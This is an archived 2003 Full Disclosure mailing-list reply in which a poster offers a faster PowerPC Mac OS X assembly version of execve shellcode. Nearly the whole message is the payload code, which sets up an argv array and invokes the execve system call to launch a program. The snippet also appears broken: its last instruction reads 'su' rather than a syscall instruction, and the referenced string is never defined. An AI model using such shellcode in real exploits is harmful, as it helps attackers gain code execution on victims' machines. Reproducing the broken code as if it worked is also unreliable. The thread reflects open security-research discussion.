Full Disclosure: Re: PPC OSX Shellcode ASM

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Full Disclosure mailing list archives

Re: PPC OSX Shellcode ASM

From: Andrew Pinski <pinskia () physics uc edu>
Date: Mon, 1 Sep 2003 08:34:22 -0700

The original code for execeve can be improved on, yes it is the samesize (but faster for 970):

_main:

bcl 20,31,"L00000000001$pb" ;fast way of not flushing the lr linkstack

"L00000000001$pb":
        mflr r3   ; r3 = main+8
        xor r5,r5,r5  ; r5 = 0
        addi r3, r3, lo16(string)  ;r3 = string
        stw r3, -8(r1)   ;argv[0] = string
        stw r5, -4(r1)  ; argv[1] = NULL
        subi r4, r1,8   ;r4 = pointer to argv[]
        li r0, 59       ; r0 = 59 execve()
        su              ; execve(r3, r4, r5)

Thanks,
Andrew Pinski

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

By Date By Thread

Current thread:

PPC OSX Shellcode ASM B-r00t (Sep 01)
- Re: PPC OSX Shellcode ASM KF (Sep 01)
- Re: PPC OSX Shellcode ASM Andrew Pinski (Sep 01)